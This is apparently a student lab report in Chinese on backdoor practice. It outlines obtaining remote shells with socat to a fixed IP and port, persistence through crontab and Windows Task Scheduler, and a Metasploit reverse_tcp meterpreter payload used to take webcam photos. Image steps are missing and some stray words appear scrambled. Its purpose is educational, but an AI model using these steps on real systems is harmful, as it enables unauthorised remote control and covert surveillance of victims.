1.查看ip
2.監聽端口
3.實驗成功以下圖
linux
1.查看虛擬機ip
2.監聽端口
3.實驗成功以下圖
web
1.用crontab -e指令編輯一條定時任務shell
輸入3,選vim.basic
2.成功
vim
在Windows系統下,打開控制面板->管理工具->任務計劃程序,建立任務,填寫任務名稱後,新建一個觸發器
在Kali環境下輸入指令socat - tcp:192.168.1.111:5234,這裏的第一個參數-表明標準的輸入輸出,第二個流鏈接到Windows主機的5234端口,此時能夠發現已經成功得到了一個cmd shell
windows
1.在Kali上使用msfconsole指令進入msf控制檯,set payload windows/meterpreter/reverse_tcp,使用監聽模塊,設置payload,設置反彈回連的IP和端口
2.利用exploit,執行監聽,在windows中,利用20155210.exe運行20155210.exe
3.使用webcam_snap指令可使用攝像頭進行拍照
tcp
經過監視程序,查看程序是否得到了不應得到的系統資源。工具
若是可以避免殺毒軟件,經過後門能夠隨意獲取不少系統的資源,有很大的危險3d